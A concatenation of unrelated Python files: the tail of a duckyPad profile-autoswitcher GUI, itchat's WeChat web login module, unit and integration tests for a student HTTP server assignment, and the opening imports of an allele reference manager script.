messagebox.showerror("Error", "Failed to open discord link!\n"+str(e))
def refresh_autoswitch():
# print("def refresh_autoswitch():")
logging.info("def refresh_autoswitch():")
if config_dict['autoswitch_enabled']:
autoswitch_status_var.set("Profile Autoswitch: ACTIVE Click me to stop")
autoswitch_status_label.config(fg='white', bg='green', cursor="hand2")
else:
autoswitch_status_var.set("Profile Autoswitch: STOPPED Click me to start")
autoswitch_status_label.config(fg='white', bg='orange red', cursor="hand2")
def toggle_autoswitch(whatever):
# print("def toggle_autoswitch(whatever):")
logging.info("def toggle_autoswitch(whatever):")
config_dict['autoswitch_enabled'] = not config_dict['autoswitch_enabled']
save_config()
refresh_autoswitch()
def open_save_folder():
# print("def open_save_folder():")
logging.info("def open_save_folder():")
messagebox.showinfo("Info", "* Copy config.txt elsewhere to make a backup!\n\n* Close the app then copy it back to restore.")
if 'darwin' in sys.platform:
subprocess.Popen(["open", save_path])
elif 'linux' in sys.platform:
subprocess.Popen(["xdg-open", save_path])
else:
webbrowser.open(save_path)
dashboard_lf = LabelFrame(root, text="Dashboard", width=620, height=95)
dashboard_lf.place(x=PADDING, y=60)
prev_profile_button = Button(dashboard_lf, text="Prev Profile", command=prev_prof_click)
prev_profile_button.config(width=11, height=1)
prev_profile_button.place(x=410, y=5)
next_profile_button = Button(dashboard_lf, text="Next Profile", command=next_prof_click)
next_profile_button.config(width=11, height=1)
next_profile_button.place(x=510, y=5)
user_manual_button = Button(dashboard_lf, text="User Manual", command=open_user_manual)
user_manual_button.config(width=11, height=1)
user_manual_button.place(x=PADDING, y=5)
discord_button = Button(dashboard_lf, text="Discord", command=open_discord)
discord_button.config(width=11, height=1)
discord_button.place(x=110, y=5)
discord_button = Button(dashboard_lf, text="Backup", command=open_save_folder)
discord_button.config(width=11, height=1)
discord_button.place(x=210, y=5)
autoswitch_status_var = StringVar()
autoswitch_status_label = Label(master=dashboard_lf, textvariable=autoswitch_status_var, font='TkFixedFont', cursor="hand2")
autoswitch_status_label.place(x=10, y=40)
autoswitch_status_label.bind("<Button-1>", toggle_autoswitch)
# --------------------
current_app_name_var = StringVar()
current_app_name_var.set("Current app name:")
current_window_title_var = StringVar()
current_window_title_var.set("Current Window Title:")
last_hid_profile = None
def duckypad_goto_profile(profile_number):
global last_hid_profile
if profile_number is None:
return
if not 1 <= profile_number <= 31:
return
if profile_number == last_hid_profile:
return
# print("def duckypad_goto_profile(profile_number):")
logging.info("def duckypad_goto_profile(profile_number):")
buffff = [0] * 64
buffff[0] = 5
buffff[2] = 1
buffff[3] = profile_number
duckypad_write_with_retry(buffff)
last_hid_profile = profile_number
profile_switch_queue = None
def t1_worker():
# print("def t1_worker():")
logging.info("def t1_worker():")
while(1):
duckypad_goto_profile(profile_switch_queue)
time.sleep(0.033)
def update_current_app_and_title():
# print("def update_current_app_and_title():")
# logging.info("def update_current_app_and_title():")
# logging.info(".")
global profile_switch_queue
root.after(250, update_current_app_and_title)
# if hid_rw.is_hid_open is False and button_pressed is True:
# connection_info_str.set("duckyPad not found")
# connection_info_label.config(foreground='red')
app_name, window_title = get_window.get_active_window()
current_app_name_var.set("App name: " + str(app_name))
current_window_title_var.set("Window title: " + str(window_title))
if rule_window is not None and rule_window.winfo_exists():
return
if config_dict['autoswitch_enabled'] is False:
return
highlight_index = None
for index, item in enumerate(config_dict['rules_list']):
if item['enabled'] is False:
continue
app_name_condition = True
if len(item['app_name']) > 0:
app_name_condition = item['app_name'].lower() in app_name.lower()
window_title_condition = True
if len(item['window_title']) > 0:
window_title_condition = item['window_title'].lower() in window_title.lower()
if app_name_condition and window_title_condition:
profile_switch_queue = item['switch_to']
highlight_index = index
break
for index, item in enumerate(config_dict['rules_list']):
if index == highlight_index:
profile_lstbox.itemconfig(index, fg='white', bg='green')
else:
profile_lstbox.itemconfig(index, fg='black', bg='white')
# ----------------
app_name_entrybox = None
window_name_entrybox = None
switch_to_entrybox = None
config_dict = {}
config_dict['rules_list'] = []
config_dict['autoswitch_enabled'] = True
def clean_input(str_input):
# print("def clean_input(str_input):")
logging.info("def clean_input(str_input):")
return str_input.strip()
def check_profile_number(raw_str):
# print("def check_profile_number(raw_str):")
logging.info("def check_profile_number(raw_str):")
try:
profile_number = int(clean_input(raw_str))
except Exception:
return None
if 1 <= profile_number <= 31:
return profile_number
return None
def make_rule_str(rule_dict):
# print("def make_rule_str(rule_dict):")
logging.info("def make_rule_str(rule_dict):")
rule_str = ''
if rule_dict['enabled']:
rule_str += " * "
else:
rule_str += " "
if len(rule_dict['app_name']) > 0:
rule_str += " " + rule_dict['app_name']
else:
rule_str += " " + "[Any]"
next_item = rule_dict['window_title']
if len(next_item) <= 0:
next_item = "[Any]"
gap = 29 - len(rule_str)
rule_str += ' '*gap + next_item
gap = 58 - len(rule_str)
rule_str += ' '*gap + str(rule_dict['switch_to'])
return rule_str
def update_rule_list_display():
# print("def update_rule_list_display():")
logging.info("def update_rule_list_display():")
profile_var.set([make_rule_str(x) for x in config_dict['rules_list']])
def save_config():
# print("def save_config():")
logging.info("def save_config():")
try:
ensure_dir(save_path)
with open(save_filename, 'w', encoding='utf8') as save_file:
save_file.write(json.dumps(config_dict, sort_keys=True))
except Exception as e:
messagebox.showerror("Error", "Save failed!\n\n"+str(traceback.format_exc()))
def save_rule_click(window, this_rule):
# print("def save_rule_click(window, this_rule):")
logging.info("def save_rule_click(window, this_rule):")
if this_rule is None:
rule_dict = {}
rule_dict["app_name"] = clean_input(app_name_entrybox.get())
rule_dict["window_title"] = clean_input(window_name_entrybox.get())
rule_dict["switch_to"] = check_profile_number(switch_to_entrybox.get())
rule_dict["enabled"] = True
if rule_dict not in config_dict['rules_list']:
config_dict['rules_list'].append(rule_dict)
update_rule_list_display()
save_config()
window.destroy()
elif this_rule is not None:
this_rule["app_name"] = clean_input(app_name_entrybox.get())
this_rule["window_title"] = clean_input(window_name_entrybox.get())
this_rule["switch_to"] = check_profile_number(switch_to_entrybox.get())
update_rule_list_display()
save_config()
window.destroy()
rule_window = None
def create_rule_window(existing_rule=None):
# print("def create_rule_window(existing_rule=None):")
logging.info("def create_rule_window(existing_rule=None):")
global rule_window
global app_name_entrybox
global window_name_entrybox
global switch_to_entrybox
rule_window = Toplevel(root)
rule_window.title("Edit rules")
rule_window.geometry("640x510")
rule_window.resizable(width=FALSE, height=FALSE)
rule_window.grab_set()
rule_edit_lf = LabelFrame(rule_window, text="Rules", width=620, height=130)
rule_edit_lf.place(x=10, y=5)
app_name_label = Label(master=rule_window, text="IF app name contains:")
app_name_label.place(x=20, y=25)
app_name_entrybox = Entry(rule_window)
app_name_entrybox.place(x=230, y=25, width=200)
window_name_label = Label(master=rule_window, text="AND window title contains:")
window_name_label.place(x=20, y=50)
window_name_entrybox = Entry(rule_window)
window_name_entrybox.place(x=230, y=50, width=200)
switch_to_label = Label(master=rule_window, text="THEN switch to profile #")
switch_to_label.place(x=20, y=75)
switch_to_entrybox = Entry(rule_window)
switch_to_entrybox.place(x=230, y=75, width=200)
if existing_rule is not None:
app_name_entrybox.insert(0, existing_rule["app_name"])
window_name_entrybox.insert(0, existing_rule["window_title"])
if existing_rule["switch_to"] is None:
switch_to_entrybox.insert(0, "")
else:
switch_to_entrybox.insert(0, str(existing_rule["switch_to"]))
rule_done_button = Button(rule_edit_lf, text="Save", command=lambda:save_rule_click(rule_window, existing_rule))
rule_done_button.config(width=75, height=1)
rule_done_button.place(x=40, y=80)
match_all_label = Label(master=rule_window, text="(leave blank to match all)")
match_all_label.place(x=450, y=25)
match_all_label2 = Label(master=rule_window, text="(leave blank to match all)")
match_all_label2.place(x=450, y=50)
match_all_label3 = Label(master=rule_window, text="(leave blank for no action)")
match_all_label3.place(x=450, y=75)
current_window_lf = LabelFrame(rule_window, text="Active window", width=620, height=80)
current_window_lf.place(x=PADDING, y=110+30)
current_app_name_label = Label(master=current_window_lf, textvariable=current_app_name_var, font='TkFixedFont')
current_app_name_label.place(x=10, y=5)
current_window_title_label = Label(master=current_window_lf, textvariable=current_window_title_var, font='TkFixedFont')
current_window_title_label.place(x=10, y=30)
window_list_lf = LabelFrame(rule_window, text="All windows", width=620, height=270)
window_list_lf.place(x=PADDING, y=195+30)
window_list_fresh_button = Button(window_list_lf, text="Refresh", command=lambda:update_windows(windows_list_text_area))
window_list_fresh_button.config(width=80, height=1)
window_list_fresh_button.place(x=20, y=220)
windows_list_text_area = ScrolledText.ScrolledText(window_list_lf, wrap='none', width = 73, height = 13)
windows_list_text_area.place(x=5, y=5)
root.update()
update_windows(windows_list_text_area)
def delete_rule_click():
# print("def delete_rule_click():")
logging.info("def delete_rule_click():")
selection = profile_lstbox.curselection()
if len(selection) <= 0:
return
config_dict['rules_list'].pop(selection[0])
update_rule_list_display()
save_config()
def edit_rule_click():
# print("def edit_rule_click():")
logging.info("def edit_rule_click():")
selection = profile_lstbox.curselection()
if len(selection) <= 0:
return
create_rule_window(config_dict['rules_list'][selection[0]])
def toggle_rule_click():
# print("def toggle_rule_click():")
logging.info("def toggle_rule_click():")
selection = profile_lstbox.curselection()
if len(selection) <= 0:
return
config_dict['rules_list'][selection[0]]['enabled'] = not config_dict['rules_list'][selection[0]]['enabled']
update_rule_list_display()
save_config()
def rule_shift_up():
# print("def rule_shift_up():")
logging.info("def rule_shift_up():")
selection = profile_lstbox.curselection()
if len(selection) <= 0 or selection[0] == 0:
return
source = selection[0]
destination = selection[0] - 1
config_dict['rules_list'][destination], config_dict['rules_list'][source] = config_dict['rules_list'][source], config_dict['rules_list'][destination]
update_rule_list_display()
profile_lstbox.selection_clear(0, len(config_dict['rules_list']))
profile_lstbox.selection_set(destination)
update_rule_list_display()
save_config()
def rule_shift_down():
# print("def rule_shift_down():")
logging.info("def rule_shift_down():")
selection = profile_lstbox.curselection()
if len(selection) <= 0 or selection[0] == len(config_dict['rules_list']) - 1:
return
source = selection[0]
destination = selection[0] + 1
config_dict['rules_list'][destination], config_dict['rules_list'][source] = config_dict['rules_list'][source], config_dict['rules_list'][destination]
update_rule_list_display()
profile_lstbox.selection_clear(0, len(config_dict['rules_list']))
profile_lstbox.selection_set(destination)
update_rule_list_display()
save_config()
rules_lf = LabelFrame(root, text="Autoswitch rules", width=620, height=410)
rules_lf.place(x=PADDING, y=160)
profile_var = StringVar()
profile_lstbox = Listbox(rules_lf, listvariable=profile_var, height=20, exportselection=0)
profile_lstbox.place(x=PADDING, y=30, width=500)
profile_lstbox.config(font='TkFixedFont')
profile_lstbox.bind('<FocusOut>', lambda e: profile_lstbox.selection_clear(0, END))
rule_header_label = Label(master=rules_lf, text="Enabled App name Window Title Profile", font='TkFixedFont')
rule_header_label.place(x=5, y=5)
new_rule_button = Button(rules_lf, text="New rule...", command=create_rule_window)
new_rule_button.config(width=11, height=1)
new_rule_button.place(x=520, y=30)
edit_rule_button = Button(rules_lf, text="Edit rule...", command=edit_rule_click)
edit_rule_button.config(width=11, height=1)
edit_rule_button.place(x=520, y=70)
move_up_button = Button(rules_lf, text="Move up", command=rule_shift_up)
move_up_button.config(width=11, height=1)
move_up_button.place(x=520, y=150)
toggle_rule_button = Button(rules_lf, text="On/Off", command=toggle_rule_click)
toggle_rule_button.config(width=11, height=1)
toggle_rule_button.place(x=520, y=190)
move_down_button = Button(rules_lf, text="Move down", command=rule_shift_down)
move_down_button.config(width=11, height=1)
move_down_button.place(x=520, y=230)
delete_rule_button = Button(rules_lf, text="Delete rule", command=delete_rule_click)
delete_rule_button.config(width=11, height=1)
delete_rule_button.place(x=520, y=300)
try:
with open(save_filename) as json_file:
temp = json.load(json_file)
if isinstance(temp, list):
config_dict['rules_list'] = temp
elif isinstance(temp, dict):
config_dict = temp
else:
raise ValueError("not a valid config file")
update_rule_list_display()
except Exception as e:
# print(traceback.format_exc())
logging.error(traceback.format_exc())
refresh_autoswitch()
# ------------------
def fw_update_click(what):
# print("def fw_update_click(what):")
logging.info("def fw_update_click(what):")
webbrowser.open('https://github.com/dekuNukem/duckyPad/blob/master/firmware_updates_and_version_history.md')
def app_update_click(event):
# print("def app_update_click(event):")
logging.info("def app_update_click(event):")
webbrowser.open('https://github.com/dekuNukem/duckyPad-profile-autoswitcher/releases')
def print_fw_update_label(this_version):
# print("def print_fw_update_label(this_version):")
logging.info("def print_fw_update_label(this_version):")
fw_result = check_update.get_firmware_update_status(this_version)
if fw_result == 0:
dp_fw_update_label.config(text='duckyPad firmware (' + str(this_version) +'): Up to date', fg='black', bg=default_button_color)
dp_fw_update_label.unbind("<Button-1>")
elif fw_result == 1:
dp_fw_update_label.config(text='duckyPad firmware (' + str(this_version) +'): Update available! Click me!', fg='black', bg='orange', cursor="hand2")
dp_fw_update_label.bind("<Button-1>", fw_update_click)
else:
dp_fw_update_label.config(text='duckyPad firmware: Unknown', fg='black', bg=default_button_color)
dp_fw_update_label.unbind("<Button-1>")
updates_lf = LabelFrame(root, text="Updates", width=620, height=80)
updates_lf.place(x=PADDING, y=570)
pc_app_update_label = Label(master=updates_lf)
pc_app_update_label.place(x=5, y=5)
update_stats = check_update.get_pc_app_update_status(THIS_VERSION_NUMBER)
if update_stats == 0:
pc_app_update_label.config(text='This app (' + str(THIS_VERSION_NUMBER) + '): Up to date', fg='black', bg=default_button_color)
pc_app_update_label.unbind("<Button-1>")
elif update_stats == 1:
pc_app_update_label.config(text='This app (' + str(THIS_VERSION_NUMBER) + '): Update available! Click me!', fg='black', bg='orange', cursor="hand2")
pc_app_update_label.bind("<Button-1>", app_update_click)
else:
pc_app_update_label.config(text='This app (' + str(THIS_VERSION_NUMBER) + '): Unknown', fg='black', bg=default_button_color)
pc_app_update_label.unbind("<Button-1>")
dp_fw_update_label = Label(master=updates_lf, text="duckyPad firmware: Unknown")
dp_fw_update_label.place(x=5, y=30)
# ------------------
t1 = threading.Thread(target=t1_worker, daemon=True)
t1.start()
root.after(250, update_current_app_and_title)
root.mainloop()
|
login.py
|
import os, sys, time, re
import threading
import json, xml.dom.minidom
import copy, pickle, random
import traceback, logging
import requests
from .. import config, utils
from ..returnvalues import ReturnValue
from .contact import update_local_chatrooms
from .messages import produce_msg
logger = logging.getLogger('itchat')
def load_login(core):
core.login = login
core.get_QRuuid = get_QRuuid
core.get_QR = get_QR
core.check_login = check_login
core.web_init = web_init
core.show_mobile_login = show_mobile_login
core.start_receiving = start_receiving
core.get_msg = get_msg
core.logout = logout
def login(self, enableCmdQR=False, picDir=None,
loginCallback=None, exitCallback=None):
if self.alive:
logger.debug('itchat has already logged in.')
return
while 1:
for getCount in range(10):
logger.info('Getting uuid of QR code.')
while not self.get_QRuuid(): time.sleep(1)
logger.info('Downloading QR code.')
if self.get_QR(enableCmdQR=enableCmdQR, picDir=picDir):
break
elif 9 == getCount:
logger.info('Failed to get QR code, please restart the program.')
sys.exit()
logger.info('Please scan the QR code to log in.')
status = self.check_login()
if status == '201':
logger.info('Please press confirm on your phone.')
while status == '201':
status = self.check_login()
time.sleep(1)
if status == '200': break
logger.info('Log in time out, reloading QR code')
self.web_init()
self.show_mobile_login()
self.get_contact(True)
if hasattr(loginCallback, '__call__'):
r = loginCallback()
else:
utils.clear_screen()
os.remove(picDir or config.DEFAULT_QR)
logger.info('Login successfully as %s' % self.storageClass.nickName)
self.start_receiving(exitCallback)
def get_QRuuid(self):
url = '%s/jslogin' % config.BASE_URL
params = {
'appid' : 'wx782c26e4c19acffb',
'fun' : 'new', }
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
self.uuid = data.group(2)
return self.uuid
def get_QR(self, uuid=None, enableCmdQR=False, picDir=None):
try:
uuid = uuid or self.uuid
picDir = picDir or config.DEFAULT_QR
url = '%s/qrcode/%s' % (config.BASE_URL, uuid)
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, stream=True, headers=headers)
with open(picDir, 'wb') as f: f.write(r.content)
except:
return False
if enableCmdQR:
utils.print_cmd_qr(picDir, enableCmdQR = enableCmdQR)
else:
utils.print_qr(picDir)
return True
def check_login(self, uuid=None):
uuid = uuid or self.uuid
url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL
params = 'tip=1&uuid=%s&_=%s' % (uuid, int(time.time()))
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.code=(\d+)'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
process_login_info(self, r.text)
return '200'
elif data and data.group(1) == '201':
return '201'
elif data and data.group(1) == '408':
return '408'
else:
return '0'
def process_login_info(core, loginContent):
''' when finish login (scanning qrcode)
* syncUrl and fileUploadingUrl will be fetched
* deviceid and msgid will be generated
* skey, wxsid, wxuin, pass_ticket will be fetched
'''
regx = r'window.redirect_uri="(\S+)";'
core.loginInfo['url'] = re.search(regx, loginContent).group(1)
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False)
core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')]
for indexUrl, detailedUrl in (
("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")),
("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")),
("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")),
("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")),
("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))):
fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl]
if indexUrl in core.loginInfo['url']:
core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \
fileUrl, syncUrl
break
else:
core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url']
core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17]
core.loginInfo['msgid'] = int(time.time() * 1000)
core.loginInfo['BaseRequest'] = {}
for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes:
if node.nodeName == 'skey':
core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data
elif node.nodeName == 'wxsid':
core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data
elif node.nodeName == 'wxuin':
core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data
def web_init(self):
url = '%s/webwxinit?r=%s' % (self.loginInfo['url'], int(time.time()))
data = { 'BaseRequest': self.loginInfo['BaseRequest'], }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
utils.emoji_formatter(dic['User'], 'NickName')
self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount'])
self.loginInfo['User'] = utils.struct_friend_info(dic['User'])
self.loginInfo['SyncKey'] = dic['SyncKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncKey']['List']])
self.storageClass.userName = dic['User']['UserName']
self.storageClass.nickName = dic['User']['NickName']
return dic
def show_mobile_login(self):
url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'Code' : 3,
'FromUserName' : self.storageClass.userName,
'ToUserName' : self.storageClass.userName,
'ClientMsgId' : int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
return ReturnValue(rawResponse=r)
def start_receiving(self, exitCallback=None):
self.alive = True
def maintain_loop():
retryCount = 0
while self.alive:
try:
i = sync_check(self)
if i is None:
self.alive = False
elif i == '0':
continue
else:
msgList, contactList = self.get_msg()
if contactList:
chatroomMsg = update_local_chatrooms(self, contactList)
self.msgList.put(chatroomMsg)
if msgList:
msgList = produce_msg(self, msgList)
for msg in msgList: self.msgList.put(msg)
retryCount = 0
except:
retryCount += 1
logger.debug(traceback.format_exc())
if self.receivingRetryCount < retryCount:
self.alive = False
else:
time.sleep(1)
self.logout()
if hasattr(exitCallback, '__call__'):
exitCallback()
else:
logger.info('LOG OUT!')
maintainThread = threading.Thread(target = maintain_loop)
maintainThread.setDaemon(True)
maintainThread.start()
def sync_check(self):
url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url'])
params = {
'r' : int(time.time() * 1000),
'skey' : self.loginInfo['skey'],
'sid' : self.loginInfo['wxsid'],
'uin' : self.loginInfo['wxuin'],
'deviceid' : self.loginInfo['deviceid'],
'synckey' : self.loginInfo['synckey'],
'_' : int(time.time() * 1000),}
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
pm = re.search(regx, r.text)
if pm is None or pm.group(1) != '0':
logger.debug('Unexpected sync check result: %s' % r.text)
return None
return pm.group(2)
def get_msg(self):
url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['wxsid'],
self.loginInfo['skey'],self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'SyncKey' : self.loginInfo['SyncKey'],
'rr' : ~int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT }
r = self.s.post(url, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
if dic['BaseResponse']['Ret'] != 0: return None, None
self.loginInfo['SyncKey'] = dic['SyncCheckKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncCheckKey']['List']])
return dic['AddMsgList'], dic['ModContactList']
def logout(self):
if self.alive:
url = '%s/webwxlogout' % self.loginInfo['url']
params = {
'redirect' : 1,
'type' : 1,
'skey' : self.loginInfo['skey'], }
headers = { 'User-Agent' : config.USER_AGENT }
self.s.get(url, params=params, headers=headers)
self.alive = False
self.s.cookies.clear()
del self.chatroomList[:]
# other info will be automatically cleared
return ReturnValue({'BaseResponse': {
'ErrMsg': 'logout successfully.',
'Ret': 0, }})
|
tests.py
|
"""Tests for the HTTP server
To run the tests simply issue:
python tests.py
To create (or delete) an example database of users, use the following command:
$ python tests.py create_db
or
$ python tests.py delete_db
"""
import sys
import time
import unittest
from multiprocessing import Process
from os import remove
from random import randint
from urllib.request import urlopen
from server import *
MISSING_REQUESTS = """[WARNING] Your system is missing the Requests package.
Requests is a Python library that greatly simplifies writing HTTP requests
and parsing HTTP responses. (Even NSA is supposedly using it; you should be
too.) Visit Requests homepage for installation instructions:
http://docs.python-requests.org
In most systems, the installation only requires that you open your command
prompt and write the following command:
pip install requests
Note that you can still issue HTTP requests and parse HTTP responses without
the Requests library, but you'll have to write a lot more code. Below, you'll
find an example of a test that does not use the Request library; it uses the
built-in package 'urllib' and the 'urlopen(str)' function. The name of the test
is 'test_get_root_index_urlopen'.
Also note that the test 'test_get_root_index_requests' which currently uses the
Requests package will fail, until you install the package (or remove the test).
"""
try:
import requests
except ImportError:
print('\033[91m' + '\033[1m' + MISSING_REQUESTS + '\033[0m')
DATA = [{"number": 1, "first": "alice", "last": "cooper"},
{"number": 2, "first": "bob", "last": "marley"},
{"number": 3, "first": "bob", "last": "dylan"},
{"number": 4, "first": "charlie", "last": "pooth"},
{"number": 5, "first": "david", "last": "bowie"}]
class ServerTest(unittest.TestCase):
"""Unit tests for the Python HTTP server.
You are highly encouraged to write additional tests."""
def setUp(self):
"""Runs before very test. Do not modify."""
self.host = "127.0.0.1"
self.port = randint(30000, 50000)
self.server = "http://%s:%d" % (self.host, self.port)
self.process = Process(target=main, args=(self.port,))
self.process.daemon = True
self.process.start()
self.remove_file(PICKLE_DB)
time.sleep(0.01)
def remove_file(self, filename):
"""Remove the DB (pickle) file. Do not to modify."""
try:
remove(filename)
except OSError:
pass
def tearDown(self):
"""Runs after very test. Do not to modify."""
self.process.terminate()
self.remove_file(PICKLE_DB)
def prepare_db_data(self):
"""Prepares some DB data and saves it to the DB"""
for item in DATA:
save_to_db(item["first"], item["last"])
# A helper method to send raw data over a TCP socket
# You can find a usage example below
def _manual_request(self, payload):
"""Sends a raw request over a TCP socket."""
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(0.25)
client.connect((self.host, self.port))
client.sendall(payload.encode("UTF-8"))
response = client.recv(8192).decode("UTF-8")
client.close()
return response
##################################################################
# UNIT TESTS
#
# These tests check whether small chunks of your code (functions)
# work correctly. They should help you build and ensure the
# well-functioning of smaller units of your code. For instance,
# a unit test can check whether your parse_header function (if you
# decide to write one) works correctly.
#
# A few examples are provided below, but you should write many
# more yourself.
##################################################################
def test_db_writes_and_reads(self):
"""Data should persist in the DB"""
self.prepare_db_data()
for original, read in zip(DATA, read_from_db()):
self.assertEqual(original, read)
def test_db_filter_single(self):
"""DB should be filterable by either number, first or last name"""
self.prepare_db_data()
entry = read_from_db({"number": 1})
self.assertEqual(len(entry), 1)
self.assertEqual(entry[0]["number"], 1)
entries = read_from_db({"first": "bob"})
self.assertEqual(len(entries), 2)
for entry in entries:
self.assertEqual(entry["first"], "bob")
self.assertTrue(entry["last"] in ("dylan", "marley"))
entry = read_from_db({"last": "cooper"})
self.assertEqual(len(entry), 1)
self.assertEqual(entry[0]["last"], "cooper")
def test_db_filter_combined(self):
"""DB should be filterable by last and first name"""
self.prepare_db_data()
entry = read_from_db({"first": "alice", "last": "cooper"})
self.assertEqual(len(entry), 1)
self.assertEqual(entry[0]["first"], "alice")
self.assertEqual(entry[0]["last"], "cooper")
# Add your unit tests below.
# Below is an example of a function that parses the request line
def test_parse_request_line1(self):
"""Parse request line 'GET / HTTP/1.1'"""
method, uri, protocol, params = parse_request_line("GET / HTTP/1.1")
self.assertEqual(method, "GET")
self.assertEqual(uri, "/")
self.assertEqual(protocol, "HTTP/1.1")
self.assertEqual(params, {})
def test_parse_request_line_params(self):
"""Parse request line 'GET /demo_form.php?name1=value HTTP/1.1'"""
method, uri, protocol, params = parse_request_line("GET /demo_form.php?name1=value HTTP/1.1")
self.assertEqual(method, "GET")
self.assertEqual(uri, "/demo_form.php")
self.assertEqual(protocol, "HTTP/1.1")
self.assertEqual(params, "name1=value")
def test_parse_request_params_GET(self):
"""Parse params 'name1=value&name2=value2'"""
params = parse_params("name1=value&name2=value2", "GET", "-", {})
self.assertEqual(params, {'name1': 'value', 'name2': 'value2'})
###################################################################
# INTEGRATION TESTS
# These tests verify the whether your server works correctly.
# Each test starts the server, sends an HTTP request and then
# checks whether the HTTP response is valid.
#
# These kinds of tests will be used for grading. As with unit
# tests, you should write a lot of additional tests yourself.
###################################################################
# This method sends a request using urllib (built-in) library
def test_get_root_index_urlopen(self):
"""Return code 200 when a GET request is made to /index.html (urlopen)"""
response = urlopen(self.server + "/index.html")
headers = dict(response.headers.items())
self.assertEqual(response.getcode(), 200)
self.assertEqual(headers["content-type"], "text/html")
html = response.read().decode("utf-8")
self.assertNotEqual(html.lower().find("to-do"), -1)
# This method sends a request using the Requests (3rd-party) library
# This is the recommended approach to writing integration tests
def test_get_root_index_requests(self):
"""Return code 200 when a GET request is made to /index.html (requests)"""
response = requests.get(self.server)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.headers["content-type"], "text/html")
self.assertNotEqual(response.text.lower().find("to-do"), -1)
# Occasionally, you'll want to send arbirary data to your server, for
# instace, to test, how your server responds to invalid HTTP requests
def test_invalid_request_line(self):
"""Return code 400 when the request line is invalid"""
response = self._manual_request("This is really not an HTTP request\n")
self.assertTrue(response.startswith("HTTP/1.1 400"))
def test_invalid_request_method(self):
"""Return code 405 when the method is invalid"""
response = self._manual_request("GET2 / HTTP/1.1\n")
self.assertTrue(response.startswith("HTTP/1.1 405"))
def test_invalid_request_uri(self):
"""Return code 400 when the uri is invalid"""
response = self._manual_request("GET 2/ HTTP/1.1\n")
self.assertTrue(response.startswith("HTTP/1.1 400"))
def test_invalid_request_version(self):
"""Return code 400 when the version is invalid"""
response = self._manual_request("GET / HTTP/1.3\n")
self.assertTrue(response.startswith("HTTP/1.1 400"))
def test_GET_app_index(self):
"""test_GET_app_index @ GET {'first': 'bob'} /app-index"""
self.prepare_db_data()
response = self._manual_request(
"GET /app-index?first=bob HTTP/1.1\n\n"
)
self.assertTrue(response.startswith("HTTP/1.1 200"))
def test_GET_app_json(self):
"""test_GET_app_index @ GET /app-json"""
self.prepare_db_data()
response = self._manual_request(
"GET /app-json HTTP/1.1\n\n"
)
self.assertTrue(response.startswith("HTTP/1.1 200"))
def test_POST_app_add(self):
"""test_contains_text @ POST {'first': 'Ed', 'last': 'Sheeran'} /app-add"""
r = requests.post(self.server, data={'key': 'value'}, timeout=2)
self.assertEqual(r.status_code, 200)
if __name__ == '__main__':
if len(sys.argv) == 2:
test_db = ServerTest()
if sys.argv[1] == "create_db":
test_db.prepare_db_data()
elif sys.argv[1] == "delete_db":
test_db.remove_file(PICKLE_DB)
else:
unittest.main()
|
AlleleReferenceManager.py
|
import os
import re
import pandas as pd
import urllib.request
import sys
# from glob import glob
import shutil
import utilities
import seq_utilities
from _collections import defaultdict
from Bio import SeqIO
# LocusTableMask = 'locus_list*.tab'
LocusTableFile = 'locus_list.tab'
# LocusTableColumns = ['locus','isORF','isPeptide','basename','URL','expected','species']
LocusTableEssential = ['locus','URL']
